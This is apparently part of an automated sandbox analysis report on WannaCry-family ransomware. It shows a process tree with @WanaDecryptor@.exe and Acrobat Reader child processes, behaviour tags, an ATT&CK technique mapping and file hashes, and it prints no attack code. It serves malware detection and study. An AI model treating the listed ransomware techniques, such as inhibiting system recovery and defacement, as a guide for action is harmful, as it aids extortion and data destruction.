                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=48CF1CEC6FB7CDBC723527E3FC0A7487 --mojo-platform-channel-handle=2504 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:532
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F21D3C4F67FAE96AD487B696CE5294B7 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:3020
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=ADE9104DF02855E085D500E2528136ED --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=ADE9104DF02855E085D500E2528136ED --renderer-client-id=8 --mojo-platform-channel-handle=1948 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:4312
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\SyncDebug.pdf"
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                    PID:4728
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:1748
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=208A41B2C985F94D47732E68E8AF121F --mojo-platform-channel-handle=1652 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:2500
                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=913EFD590D598BCD38AC96143EFE864D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=913EFD590D598BCD38AC96143EFE864D --renderer-client-id=2 --mojo-platform-channel-handle=1660 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:3780
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8686B99F3F5D64074E89B23DB0F8FDE3 --mojo-platform-channel-handle=2432 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:640
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CFC01C8DE20DEDF878A4C0EA08B8D2D7 --mojo-platform-channel-handle=1920 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:868
                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=13230972C0741D367B4E152937CB634D --mojo-platform-channel-handle=2608 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:4252
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C588B423A95DDD9C2AF302526C58C057 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C588B423A95DDD9C2AF302526C58C057 --renderer-client-id=8 --mojo-platform-channel-handle=1904 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:176
                                                                                                                                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:2220
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    PID:3816
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\@WanaDecryptor@.exe"
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                    PID:760
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                                                                                                    werfault.exe /h /shared Global\496c1939b15f47afa4d08cfb72ba0569 /t 4128 /p 4808
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:716
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\@WanaDecryptor@.bmp"
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                      PID:4588
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\@WanaDecryptor@.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\@WanaDecryptor@.exe"
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                        PID:4296

                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1158

                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                      File Deletion

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1107

                                                                                                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1158

                                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                                                      Impact

                                                                                                                                                                                                                                                                                      Inhibit System Recovery

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1490

                                                                                                                                                                                                                                                                                      Defacement

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1491

                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        264KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        3f53f960f5f3b67ed7d00b91d0ce2e1e

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        d4a2ef117901e2220380bfa28e410ac7cf8ab68f

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        e50a1b21893cacb59bba4d8f171cbd2a55589b28f4a88acd6f005434d46f0084

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        9a3736470a475d7d2eeff1d267279f8513e20e3ccefa76c3fda6d5ebdaf138c07ea06b615850b48470cbb26775f5096f032fcf92070675dcc9b6fa00c9a164f8

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        292B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        e8ad90a671e0c8884a95ed2667f19a1d

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        12030fc2c753df5edb7a7ea46d730a7b3e2093fb

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        765ddb527d770998edf17095fd977f820d159f198791f8b16ac23d5626897c9c

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        a81dd09996830bbf000faee755ec9760dbc01a5fd117ff0ad9a0c4a5182625c075dc7948252ab8162d3e46c1aac06fe5c5cdd38f32eb16f7cc36409cb2316459

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        1771c5e3268af9fef738ca95d3251ebb

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        b852e7eefa27522acf1a0d650a24b464e93c48a9

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        92d6af97148b0a6d90a714ace03481a94eb8edf0a963e9606ec41892bd9b13bf

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        11415fe21716e5251daa8007053b96682ecce8dd13baae9834b7bfedcbea08a2efc36fc3a048b3204303736615cdb48c7b2c00f9b0edf04eb2ae08bc151158bd

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        6faa17b5771aceb2cef73accdb863e20

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        2978302248e4766a777082a41f39d79b29e830fd

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        5a8e593c604238a4d785d0a7508f1e48e38daa60f12ee5294da1611a9f724f90

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        a82e0eed77cf874cfcf29f7fc38139dc9e9d9d8ac3d9f601e8d4de4779fe2034a70967160f2a3307fec94e83a4e375c062a8b6f3541d0a0cac668ab689341e13

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        471B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        7bdd8d5c1fc9bc0932c943aecc316772

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        3b15eda8f3d70179b2b95f39bac8eca8bf4f4403

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        26040b9551ac15a9359d89d268c96dc9313e36279d0d2d61291e1db0a323c4fe

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        da7b62b392c8fb31791785f11badb476d0d0e813cdb6294f2c09edfd9d6b38dd581946572d2e748ed533e28aa146e8cd575481196fb1805cac0f555013aa6f83

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        430B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        f216cfaeceb596c7dea322b6835da020

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        1dbb5ec270e40ec9293e46c7eb52b97d1c435a92

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        17e0f5cf24605872bdf97cbe327c9c671998d046a953454e8f779310fecdefd0

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        93b84706bb3a76526e36136fce2b5e90151bb13b31f318f978b6b625b57de5e76b8e7acbdaf1ad095642adcde2631c1c08e05db2046246817ea2c920a5a2d2d6

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        94KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        5a7ab71100ba007f7fb7f94626b3c4cc

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        9901fb67f8ae481299077ab93d03fc301fabdb9e

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        e6efbca7242f741647e81086063857548afd859abae67d450ee343b1f273a10a

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        8fa12e0d4dfe63b8356b0ee5f05d8a8a682479197e4214f47352f3f260a54dbcde8bd3b4f836651843192775f448ad1ed4d534e06829d28eddaa11380a824517

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        236KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        65cb1422b5e8408e9681846ae600e5ce

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        a62548911bc7bbb448dd30f0bb17c31cac7408bf

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        df4f721d75b8090edf67bc8fefc5dfa617e45998518050bc29785300db9c89d4

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        6614d664643ec66ac06c0684302c34850d815284078c6257d2fc8ef7758ad75a843a1548b4d620e659812f2f7412b98b69616b7df0f5c729a1b56e2ae4aba342

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        236KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        bf409e84682afe5ede74a5a77050ab3e

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        2020a0392043bd9b88cf8aac71361a1c28fb1b45

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        4f9f8996c3a2e1be659d524a29570f6c19b7f81a5064b0dd8b407b4f7a1dc43e

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        053d6f2f52e4843f23b5b5d8d6b5da1a57c899f0b686e99d61779b88fdba93e6d1986c99dc458f738f4d1f525f13b7ae9d18d88c536875433c5ef4d45a72fffe

